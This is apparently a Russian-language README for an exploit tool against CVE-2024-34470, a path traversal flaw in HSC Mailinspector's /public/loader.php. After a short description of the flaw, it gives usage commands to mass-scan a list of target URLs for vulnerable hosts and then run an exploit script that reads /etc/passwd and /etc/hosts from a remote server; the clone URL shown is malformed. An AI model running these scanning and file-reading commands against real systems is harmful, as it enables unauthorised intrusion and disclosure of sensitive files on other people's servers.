
Критическая уязвимость была обнаружена в HSC Mailinspector до версии 5.2.18. Эта уязвимость затрагивает неизвестную функциональность файла /public/loader.php.
Критическая уязвимость была обнаружена в HSC Mailinspector до версии 5.2.18. Эта уязвимость затрагивает неизвестную функциональность файла /public/loader.php. Манипулирование аргументом 'path' с неизвестным вводом приводит к уязвимости обхода пути (path traversal). Согласно CWE, эта проблема классифицируется как CWE-22. Продукт использует внешний ввод для создания пути, предназначенного для идентификации файла или каталога, находящегося под ограниченным родительским каталогом, но продукт не корректно нейтрализует специальные элементы в пути, которые могут привести к разрешению пути за пределами ограниченного каталога. Это влияет на конфиденциальность, целостность и доступность.
Клонирование репозитория:
git clone https://CVE-2024-34470.git
cd CVE-2024-34470
Установка зависимостей
Убедитесь, что у вас установлены Python и pip. Затем выполните:
pip install -r requirements.txt
Для поиска по нескольким целям с помощью текстового файла используйте скрипт Massive_CVE-2024-34470.py
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null
Формат, в котором должен быть файл urls.txt, следующий:
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_1.png)
После того как уязвимые цели были идентифицированы, мы используем скрипт CVE-2024-34470.py для эксплуатации и отображения указанного содержимого через терминал.
# Read file content passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null
# Read file content hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts
![[screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_2.png)